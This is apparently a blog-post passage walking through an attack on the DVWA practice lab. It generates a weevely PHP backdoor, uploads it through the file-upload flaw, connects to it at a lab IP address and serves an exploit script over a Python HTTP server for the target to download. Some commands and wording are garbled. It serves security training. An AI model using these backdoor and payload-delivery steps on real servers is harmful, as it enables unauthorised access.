2. Once we know that DVWA have vulnerabilities in web upload feature, with which we will exploit these loopholes to install backdoor files.
3. Open a new terminal command to create a backdoor which will be uploaded to the web DVWA with the command # weevely generate TMP.php 1234, 1234 is the password that we use, tmp.php is the backdoor file to be uploaded.
4. Upload the file tmp.php we have made into a web DVWA through the upload feature.
5. Take the upload session to be made in our access to the system by using the tool weevely with command :
# Weevely http://192.168.56.101/dvwa/hackable/uploads/tmp.php 1234
Ip address that is in use is Ip addres server that we will make the server to download files from the target.
6. Open the terminal command to run a command searchploit version of the operating system that is used to determine the vulnerability of the target system that is used to run the web, so we get a script which we will send to the web.
7. Since we are in the network localhost then we will make our computers as if into the server to send the script file to a web tablet, with the command:
# Python -m SimpleHTTPServer: 80
8. After the computer into a server, we will instruct the web to download a script file that we have made.
9. The script file has been downloaded by the web into the system.
Tidak ada komentar:
Posting Komentar